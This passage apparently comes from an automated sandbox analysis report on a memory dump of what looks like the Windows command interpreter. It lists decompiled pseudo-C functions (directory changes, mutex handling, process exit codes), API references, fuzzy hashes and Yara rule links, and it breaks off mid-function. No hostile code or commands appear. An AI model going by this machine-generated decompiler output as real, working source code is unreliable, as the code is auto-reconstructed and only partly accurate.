                                                    0x011ec0df
                                                    0x011ec0e2
                                                    0x011ec0e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ec0e5
                                                    0x011dee51
                                                    0x00000000
                                                    0x011dee57
                                                    0x011dee59
                                                    0x011dee59
                                                    0x011dee51
                                                    0x011dee40
                                                    0x011dee5b
                                                    0x011dee5d
                                                    0x011dee64
                                                    0x011dee67
                                                    0x011dee69
                                                    0x011dee99
                                                    0x011dee99
                                                    0x011dee6b
                                                    0x011dee7a
                                                    0x011dee7c
                                                    0x011dee80
                                                    0x011dee84
                                                    0x011dee8b
                                                    0x00000000
                                                    0x011dee8d
                                                    0x011dee8d
                                                    0x011dee90
                                                    0x011dee91
                                                    0x011dee94
                                                    0x011dee97
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee97
                                                    0x00000000
                                                    0x011dee8b
                                                    0x011deea0
                                                    0x00000000
                                                    0x00000000
                                                    0x011deea0
                                                    0x011deea2
                                                    0x011deea2
                                                    0x011deea7
                                                    0x011deea7
                                                    0x011deeaa
                                                    0x011deda4
                                                    0x011dedbc
                                                    0x011dede9
                                                    0x011dedec
                                                    0x011dedf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dedbe
                                                    0x011dedbe
                                                    0x011dedca
                                                    0x011deeb2
                                                    0x011deeb4
                                                    0x011deeb4
                                                    0x011deeb4
                                                    0x011deeb7
                                                    0x011deeb9
                                                    0x011deebc
                                                    0x011deec0
                                                    0x00000000
                                                    0x011dedd0
                                                    0x011dedd5
                                                    0x00000000
                                                    0x011dedd5
                                                    0x011dedca
                                                    0x00000000
                                                    0x011dedbc
                                                    0x011dedde
                                                    0x011dede8
                                                    0x00000000
                                                    0x011dede8
                                                    0x011ec0f7
                                                    0x011ec103
                                                    0x011ec109
                                                    0x011ec111
                                                    0x011ec117
                                                    0x011ec117
                                                    0x011defea
                                                    0x011defef
                                                    0x011ec125
                                                    0x011ec125
                                                    0x011deff5
                                                    0x011deffb
                                                    0x00000000
                                                    0x011deffb
                                                    0x011debcb
                                                    0x011debce
                                                    0x011debcf
                                                    0x011debd2
                                                    0x011debdb
                                                    0x011debdb
                                                    0x00000000
                                                    0x011debc5
                                                    0x011de9d9
                                                    0x011de9d9
                                                    0x011de9df
                                                    0x011de9e4
                                                    0x011de9ec
                                                    0x011dea31
                                                    0x00000000
                                                    0x011dea33
                                                    0x011de9ee
                                                    0x011de9f8
                                                    0x011de9fa
                                                    0x011dea00
                                                    0x011dea07
                                                    0x011dea0e
                                                    0x00000000
                                                    0x011dea10
                                                    0x011dea10
                                                    0x011dea13
                                                    0x011dea16
                                                    0x011dea19
                                                    0x00000000
                                                    0x011dea1b
                                                    0x011dea1b
                                                    0x011dea1b
                                                    0x011dea1b
                                                    0x011dea19
                                                    0x011dea24
                                                    0x011dea26
                                                    0x00000000
                                                    0x011dea26
                                                    0x011dea22
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dea22
                                                    0x011de9ec
                                                    0x011dea29
                                                    0x011dea2e
                                                    0x011dea2e
                                                    0x011de9d3
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • wcschr.MSVCRT ref: 011DEB6D
                                                    • iswspace.MSVCRT ref: 011DEC37
                                                    • wcschr.MSVCRT ref: 011DEC4F
                                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000000,?,011DED9F,?,00000000,?), ref: 011EC024
                                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC036
                                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,?), ref: 011EC049
                                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC05B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                                    • String ID:
                                                    • API String ID: 2511250921-0
                                                    • Opcode ID: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                                    • Instruction ID: 855c1b3e7172a5eb656384bddc97ad64c30c504bc0c15a4a9b2322f28b364cc7
                                                    • Opcode Fuzzy Hash: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                                    • Instruction Fuzzy Hash: 14412C31601212C7EF3C5F6CD8987B637A5EF90706F04056EE9469B185EF709884CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F93E2, Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E011F93E2(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				int _v36;
				char _v40;
				signed int _v44;
				void _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				short _t51;
				short _t53;
				void* _t58;
				void* _t59;
				WCHAR* _t61;
				int _t62;
				short* _t75;
				void* _t76;
				short _t77;
				int _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				WCHAR* _t91;
				signed int _t96;

				_t83 = __edx;
				_t68 = _t96;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t96 + 4));
				_t94 = (_t96 & 0xfffffff8) + 4;
				_t39 =  *0x11fd0b4; // 0x1805bc26
				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
				_v40 = 1;
				_t86 = 0;
				_v36 = 0x104;
				_v44 = _v44 & 0;
				_t89 = __ecx;
				memset( &_v564, 0, 0x104);
				if(E011E0C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L23:
					__imp__??_V@YAXPAX@Z(_v44);
					_pop(_t87);
					_pop(_t90);
					return E011E6FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
				}
				_t51 = 0x3d;
				_v24 = _t51;
				_v22 = _t89 + 0x40;
				_t53 = 0x3a;
				_v20 = _t53;
				_v18 = 0;
				_t91 = E011DCFBC( &_v24);
				if(_t91 == 0) {
					L4:
					_t75 = _v44;
					if(_t75 == 0) {
						_t75 =  &_v564;
					}
					 *_t75 = _v22;
					_t76 = _v44;
					if(_t76 == 0) {
						_t76 =  &_v564;
					}
					 *((short*)(_t76 + 2)) = _v20;
					_t58 = _v44;
					if(_t58 == 0) {
						_t58 =  &_v564;
					}
					_t77 = 0x5c;
					 *((short*)(_t58 + 4)) = _t77;
					_t59 = _v44;
					if(_t59 == 0) {
						_t59 =  &_v564;
					}
					 *((short*)(_t59 + 6)) = 0;
					_t84 = _v44;
					if(_v44 == 0) {
						_t84 =  &_v564;
					}
					_t79 =  &_v24;
					E011E3A50( &_v24, _t84);
					_t61 = _v44;
					if(_t61 == 0) {
						_t61 =  &_v564;
					}
					_t62 = SetCurrentDirectoryW(_t61);
					if(_t62 == 0) {
						_push(_t62);
						_push(GetLastError());
						E011DC5A2(_t79);
					}
					if(_t91 != 0) {
						SetErrorMode(_t86);
					}
					L20:
					_t80 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t80 = 0x1213ab0;
					}
					_t83 =  *0x1213cc0;
					_t49 = E011E36CB(_t68, _t80,  *0x1213cc0, 0);
					goto L23;
				}
				if(SetCurrentDirectoryW(_t91) != 0) {
					goto L20;
				}
				_t86 = SetErrorMode(1);
				goto L4;
			}
































                                                    0x011f93e2
                                                    0x011f93e5
                                                    0x011f93e7
                                                    0x011f93e8
                                                    0x011f93f3
                                                    0x011f93f7
                                                    0x011f93ff
                                                    0x011f9406
                                                    0x011f9410
                                                    0x011f9415
                                                    0x011f9417
                                                    0x011f941a
                                                    0x011f9425
                                                    0x011f9427
                                                    0x011f9450
                                                    0x011f954b
                                                    0x011f954e
                                                    0x011f9558
                                                    0x011f955b
                                                    0x011f9567
                                                    0x011f9567
                                                    0x011f9458
                                                    0x011f9459
                                                    0x011f9463
                                                    0x011f9469
                                                    0x011f946a
                                                    0x011f9470
                                                    0x011f9479
                                                    0x011f947d
                                                    0x011f9498
                                                    0x011f9498
                                                    0x011f949d
                                                    0x011f949f
                                                    0x011f949f
                                                    0x011f94a9
                                                    0x011f94ac
                                                    0x011f94b1
                                                    0x011f94b3
                                                    0x011f94b3
                                                    0x011f94bd
                                                    0x011f94c1
                                                    0x011f94c6
                                                    0x011f94c8
                                                    0x011f94c8
                                                    0x011f94d0
                                                    0x011f94d1
                                                    0x011f94d5
                                                    0x011f94da
                                                    0x011f94dc
                                                    0x011f94dc
                                                    0x011f94e4
                                                    0x011f94e8
                                                    0x011f94ed
                                                    0x011f94ef
                                                    0x011f94ef
                                                    0x011f94f5
                                                    0x011f94f8
                                                    0x011f94fd
                                                    0x011f9502
                                                    0x011f9504
                                                    0x011f9504
                                                    0x011f950b
                                                    0x011f9513
                                                    0x011f9515
                                                    0x011f951c
                                                    0x011f951d
                                                    0x011f9523
                                                    0x011f9526
                                                    0x011f9529
                                                    0x011f9529
                                                    0x011f952f
                                                    0x011f952f
                                                    0x011f9537
                                                    0x011f9539
                                                    0x011f9539
                                                    0x011f953e
                                                    0x011f9546
                                                    0x00000000
                                                    0x011f9546
                                                    0x011f9488
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9496
                                                    0x00000000

                                                    APIs
                                                    • memset.MSVCRT ref: 011F9427
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F954E
                                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 011F9480
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 011F9490
                                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 011F950B
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9516
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9529
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                    • String ID:
                                                    • API String ID: 920682188-0
                                                    • Opcode ID: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                                    • Instruction ID: 3cf2fd26c6c5f8520a21dc510bc602aab42f822614b94fcb95667366dc233f2d
                                                    • Opcode Fuzzy Hash: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                                    • Instruction Fuzzy Hash: 7D41B431A00219ABDF29DFA5E858BEEB7B4FF58718F00419DE905E7250EB34DA84CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F17B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E011F17B6(char* __ecx, signed int* __edx) {
				intOrPtr _v0;
				signed int _v8;
				char _v528;
				void* _v532;
				signed int _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t25;
				void* _t29;
				signed int* _t39;
				char* _t40;
				void* _t54;
				signed int _t55;
				signed int _t57;

				_t40 = __ecx;
				_t20 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t20 ^ _t57;
				_t39 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E011E274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_t25 =  &_v528;
				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
				_t54 = _t25;
				_v532 = _t54;
				if(_t54 != 0) {
					E011F2D6D( &_v532,  &_v540);
					_t49 =  &_v536;
					_v536 = 0;
					_t55 = 0;
					_t53 = E011F1578( &_v528,  &_v536,  &_v532);
					if(_t53 >= 0) {
						_t55 = _v536 << 2;
						_t53 = 0;
					} else {
						_push(_t53);
						_push("wil");
						_t49 = 0x6a;
						E011F292C();
					}
					if(_t53 >= 0) {
						if(_t55 == 0) {
							L14:
							_t49 =  &_v532;
							_t40 =  &_v528;
							_t29 = E011F250A(_t40,  &_v532, _t53, _t39);
							_t53 = _t29;
							if(_t29 >= 0) {
								goto L9;
							} else {
								_t49 = 0x129;
								goto L16;
							}
							goto L18;
						} else {
							 *_t39 = _t55;
							_t40 =  *_t55 + 1;
							 *( *_t39) = _t40;
							L9:
							_t53 = 0;
						}
					} else {
						_t49 = 0x121;
						L16:
						_t40 = _v0;
						E011F292C("wil", _t53);
					}
					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
						_push(_t40);
						L13:
						E011F2D56();
						goto L14;
					}
					_t54 = _v532;
				} else {
					_t53 = E011F1EBE(_t40);
				}
				L18:
				if(_t54 != 0 && CloseHandle(_t54) == 0) {
					_push(_t40);
					goto L13;
				}
				return E011E6FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
			}




















                                                    0x011f17b6
                                                    0x011f17c1
                                                    0x011f17c8
                                                    0x011f17ce
                                                    0x011f17d5
                                                    0x011f17ef
                                                    0x011f17f7
                                                    0x011f1805
                                                    0x011f180b
                                                    0x011f180d
                                                    0x011f1815
                                                    0x011f1833
                                                    0x011f1839
                                                    0x011f183f
                                                    0x011f184b
                                                    0x011f1852
                                                    0x011f1856
                                                    0x011f1871
                                                    0x011f1874
                                                    0x011f1858
                                                    0x011f185b
                                                    0x011f185c
                                                    0x011f1863
                                                    0x011f1864
                                                    0x011f1864
                                                    0x011f1878
                                                    0x011f1883
                                                    0x011f18b7
                                                    0x011f18b8
                                                    0x011f18be
                                                    0x011f18c4
                                                    0x011f18c9
                                                    0x011f18cd
                                                    0x00000000
                                                    0x011f18cf
                                                    0x011f18cf
                                                    0x00000000
                                                    0x011f18cf
                                                    0x00000000
                                                    0x011f1885
                                                    0x011f1885
                                                    0x011f188b
                                                    0x011f188c
                                                    0x011f188e
                                                    0x011f188e
                                                    0x011f188e
                                                    0x011f187a
                                                    0x011f187a
                                                    0x011f18d4
                                                    0x011f18d4
                                                    0x011f18dd
                                                    0x011f18dd
                                                    0x011f1897
                                                    0x011f18a9
                                                    0x011f18af
                                                    0x011f18b2
                                                    0x00000000
                                                    0x011f18b2
                                                    0x011f18e4
                                                    0x011f1817
                                                    0x011f181c
                                                    0x011f181c
                                                    0x011f18ea
                                                    0x011f18ec
                                                    0x011f18f9
                                                    0x00000000
                                                    0x011f18fa
                                                    0x011f1913

                                                    APIs
                                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 011F17D7
                                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 011F1805
                                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 011F189F
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 011F18EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Mutex$CloseCreateCurrentHandleProcessRelease
                                                    • String ID: Local\SM0:%d:%d:%hs$wil
                                                    • API String ID: 3048291649-2303653343
                                                    • Opcode ID: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                                    • Instruction ID: 20532989193382df4dd7e8a453e33cca442cd0ce9d3e926a420876a1f1f93007
                                                    • Opcode Fuzzy Hash: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                                    • Instruction Fuzzy Hash: 0B312871E40129EBCB2DDB54DD88FEA7775ABA0704F0141ADEA09A7244DB709D41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E4C3E, Relevance: 10.5, APIs: 7, Instructions: 42synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E011E4C3E() {
				long _v8;
				int _t8;
				void* _t15;
				void* _t18;

				_push(_t15);
				_v8 = _v8 | 0xffffffff;
				_t18 = _t15;
				 *0x11fd0db = 0;
				WaitForSingleObject(_t18, 0xffffffff);
				_t8 = GetExitCodeProcess(_t18,  &_v8);
				if(_v8 == 0xc000013a) {
					EnterCriticalSection( *0x1203858);
					 *0x11fd544 = 1;
					LeaveCriticalSection( *0x1203858);
					fflush(E011E7721(fprintf(E011E7721(_t8, 2), "^C"), 2));
				}
				 *0x11fd0db = 1;
				CloseHandle(_t18);
				return _v8;
			}







                                                    0x011e4c43
                                                    0x011e4c44
                                                    0x011e4c49
                                                    0x011e4c4b
                                                    0x011e4c55
                                                    0x011e4c60
                                                    0x011e4c6d
                                                    0x011eee57
                                                    0x011eee63
                                                    0x011eee6d
                                                    0x011eee8f
                                                    0x011eee95
                                                    0x011e4c74
                                                    0x011e4c7b
                                                    0x011e4c88

                                                    APIs
                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C55
                                                    • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C60
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C7B
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE57
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE6D
                                                    • fprintf.MSVCRT ref: 011EEE81
                                                    • fflush.MSVCRT ref: 011EEE8F
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                    • String ID:
                                                    • API String ID: 4271573189-0
                                                    • Opcode ID: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                                    • Instruction ID: 1e3d46453040eada4163dbbde99bddb775cd771af8901d3305254d412792885d
                                                    • Opcode Fuzzy Hash: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                                    • Instruction Fuzzy Hash: A401D431801654FFDF24EBE8B80CA993BADEB15319F100249F024921D9CFB006808B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E07C0, Relevance: 9.4, APIs: 6, Instructions: 361COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E011E07C0(void* __ebx, long __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				void* _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				short _v564;
				char _v576;
				char* _v580;
				char _v1100;
				void* _v1104;
				long _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr* _v1120;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				int _t75;
				long _t78;
				signed short* _t81;
				signed short _t90;
				intOrPtr* _t91;
				short* _t96;
				char* _t97;
				intOrPtr _t100;
				intOrPtr _t103;
				wchar_t* _t104;
				long _t107;
				signed int _t108;
				signed char _t120;
				long _t121;
				wchar_t* _t126;
				int _t127;
				void* _t129;
				wchar_t* _t130;
				signed short* _t141;
				wchar_t* _t158;
				wchar_t* _t163;
				signed int _t167;
				signed int _t171;
				long _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				void* _t184;
				void* _t186;
				signed int _t187;
				int _t188;
				signed int _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t193;
				void* _t194;
				void* _t196;
				signed int _t197;
				void* _t199;
				void* _t200;

				_push(0xfffffffe);
				_push(0x11fbd98);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_t200 = _t199 - 0x450;
				_t70 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _v12 ^ _t70;
				_t71 = _t70 ^ _t197;
				_v32 = _t71;
				_push(__ebx);
				_push(_t71);
				 *[fs:0x0] =  &_v20;
				_t175 = __ecx;
				_v1108 = __ecx;
				_v1112 = 0;
				GetConsoleTitleW( &_v564, 0x104);
				if( *(_t175 + 0x38) == 0) {
					L88:
					_t75 = 1;
					goto L44;
				} else {
					E011E0D51( &_v1100);
					if(_v576 == 0) {
						_t78 = 0x104;
					} else {
						_t78 = 0x7fe7;
					}
					if(E011E0C70( &_v1100, _t78) < 0) {
						L87:
						E011E0DE8(_t79,  &_v1100);
						goto L88;
					} else {
						_t81 =  *(_t175 + 0x38);
						if(_t81[1] == 0x3a) {
							_t140 =  *_t81;
							if(E011E29BB( *_t81) == 0) {
								_push(0);
								_push(0xf);
								goto L83;
							} else {
								_t140 =  *( *(_t175 + 0x38));
								if(E011E6A96( *( *(_t175 + 0x38))) != 0) {
									_push(0);
									_push(GetLastError());
									L83:
									_t79 = E011DC5A2(_t140);
									goto L86;
								} else {
									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
									_t141 =  *(_t175 + 0x38);
									_t55 =  &(_t141[1]); // 0x2
									_t169 = _t55;
									do {
										_t90 =  *_t141;
										_t141 =  &(_t141[1]);
									} while (_t90 != 0);
									if(_t141 - _t169 >> 1 == 2) {
										_t91 = E011F93E2(_t187, _t169);
										goto L90;
									} else {
										goto L65;
									}
								}
							}
							goto L44;
						} else {
							_t169 =  &_v1104;
							_t189 = E011DE040(_t175,  &_v1104);
							_v1116 = _t189;
							if(_t189 == 0xffffffff) {
								L65:
								_t188 = E011DC7AA(_t175);
								goto L43;
							} else {
								if(_t189 == 0xfffffffe) {
									goto L87;
								} else {
									_t91 =  *((intOrPtr*)(0x11d1624 + (_t189 + _t189 * 2) * 8));
									_v1120 = _t91;
									if(_t91 == 0) {
										L90:
										E011E0DE8(_t91,  &_v1100);
										_t75 = 0;
										goto L44;
									} else {
										_t96 = _v580;
										if(_t96 == 0) {
											_t96 =  &_v1100;
										}
										 *_t96 = 0x2f;
										_t97 = _v580;
										if(_t97 == 0) {
											_t97 =  &_v1100;
										}
										 *((short*)(_t97 + 2)) = 0;
										if(_v580 == 0) {
											_t169 =  &_v1100;
										}
										_t130 = E011DEA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
										if(_t189 == 0xa) {
											if(_t130 == 0) {
												goto L12;
											} else {
												_t127 = wcsncmp(_t130, "/", 4);
												_t200 = _t200 + 0xc;
												if(_t127 != 0) {
													goto L14;
												} else {
													goto L12;
												}
											}
										} else {
											L12:
											if(_t189 == 0x1f) {
												L14:
												if(_t130 == 0) {
													L34:
													if(E011DE340(_t175) != 0) {
														E011E100C(_t99, _t99);
													}
													_v8 = 0;
													_t190 = _v1120;
													_push(_t175);
													if(_t190 == E011D5F50) {
														_t100 = E011D5F50();
													} else {
														if(_t190 == E011D6980) {
															_t100 = E011D6980();
														} else {
															if(_t190 == E011E2360) {
																_t100 = E011E2360();
															} else {
																if(_t190 != E011D9410) {
																	if(_t190 == E011E51B0) {
																		_t100 = E011E51B0();
																	} else {
																		 *0x12194b4();
																		_t100 =  *_t190();
																	}
																} else {
																	_t100 = E011D9410();
																}
															}
														}
													}
													_t188 = _t100;
													_v1112 = _t188;
													_v8 = 0xfffffffe;
													_t93 = E011E0BDF(_t100);
													L43:
													E011E0DE8(_t93,  &_v1100);
													_t75 = _t188;
													L44:
													 *[fs:0x0] = _v20;
													_pop(_t176);
													_pop(_t186);
													_pop(_t129);
													return E011E6FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
												} else {
													while( *_t130 != 0) {
														do {
															_t103 =  *_t191;
															_t191 = _t191 + 2;
														} while (_t103 != 0);
														_t193 = _t191 - _t155 >> 1;
														_t104 = wcschr(_t130, 0x22);
														_t200 = _t200 + 8;
														if(_t104 != 0) {
															memset(0x1213f10, 0, 0x1000 << 2);
															_t200 = _t200 + 0xc;
															_t158 = _t130;
															_t46 =  &(_t158[0]); // 0x2
															_t171 = _t46;
															do {
																_t107 =  *_t158;
																_t158 =  &(_t158[0]);
															} while (_t107 != 0);
															_t155 = _t158 - _t171 >> 1;
															_t179 = 0;
															_t108 = 0;
															if(_t155 > 0) {
																do {
																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
																	if(_t171 != 0x22) {
																		 *(0x1213f10 + _t179 * 2) = _t171;
																		_t179 = _t179 + 1;
																	}
																	_t108 = _t108 + 1;
																} while (_t108 < _t155);
															}
															_t180 = _t179 + _t179;
															if(_t180 >= 0x4000) {
																E011E711D(_t108, _t130, _t155, _t171, _t180, _t193);
																_push(_t197);
																_push(_t193);
																_push(_t180);
																_t194 = E011E0C70(0x1213ab0, ((0 |  *0x1213cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
																if(_t194 < 0) {
																	_push(_t194);
																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																	_push(0x36);
																	goto L101;
																} else {
																	_t162 =  *0x1213cb8;
																	if( *0x1213cb8 == 0) {
																		_t162 = 0x1213ab0;
																	}
																	_t194 = E011E6826(_t162,  *0x1213cc0, _v0, _a4);
																	if(_t194 < 0) {
																		_push(_t194);
																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																		_push(0x37);
																		L101:
																		E011F292C();
																	}
																}
																return _t194;
															} else {
																 *((short*)(_t180 + 0x1213f10)) = 0;
																_t169 = 0x1213f10;
																goto L20;
															}
														} else {
															_t169 = _t130;
															L20:
															_t196 = _t193 + 1;
															if(_t196 == 0 || _t196 > 0x7fffffff) {
																if(_t196 != 0) {
																	 *_t130 = 0;
																}
															} else {
																_t126 = _t130;
																_t184 = 0x7ffffffe - _t196;
																_t169 = _t169 - _t130;
																while(_t184 + _t196 != 0) {
																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
																	if(_t167 != 0) {
																		 *_t126 = _t167;
																		_t126 =  &(_t126[0]);
																		_t196 = _t196 - 1;
																		if(_t196 != 0) {
																			continue;
																		}
																	}
																	break;
																}
																if(_t196 == 0) {
																	_t126 = _t126 - 2;
																}
																_t155 = 0;
																 *_t126 = 0;
															}
															_t120 = _v1104;
															if((_t120 & 0x00000001) != 0) {
																if(_t130[0] != 0x3a) {
																	goto L29;
																} else {
																	_t155 =  *_t130;
																	if(E011E29BB( *_t130) == 0) {
																		_push(0);
																		_push(0xf);
																		goto L85;
																	} else {
																		if(_v1116 == 4) {
																			L71:
																			_t120 = _v1104;
																			goto L29;
																		} else {
																			_t155 =  *_t130;
																			if(E011E6A96( *_t130) != 0) {
																				_push(0);
																				_push(GetLastError());
																				goto L85;
																			} else {
																				goto L71;
																			}
																		}
																	}
																}
															} else {
																L29:
																if((_t120 & 0x00000002) != 0) {
																	if( *_t130 != 0x2f) {
																		goto L30;
																	} else {
																		_push(0);
																		_push(0x232a);
																		L85:
																		_t79 = E011DC5A2(_t155);
																		 *0x120b8b0 = 1;
																		L86:
																		goto L87;
																	}
																} else {
																	L30:
																	_t163 = _t130;
																	_t34 =  &(_t163[0]); // 0x2
																	_t169 = _t34;
																	do {
																		_t121 =  *_t163;
																		_t163 =  &(_t163[0]);
																	} while (_t121 != 0);
																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
